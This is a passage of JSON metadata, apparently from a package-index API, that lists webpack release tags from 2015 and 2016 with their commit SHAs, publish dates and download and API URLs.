ebpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk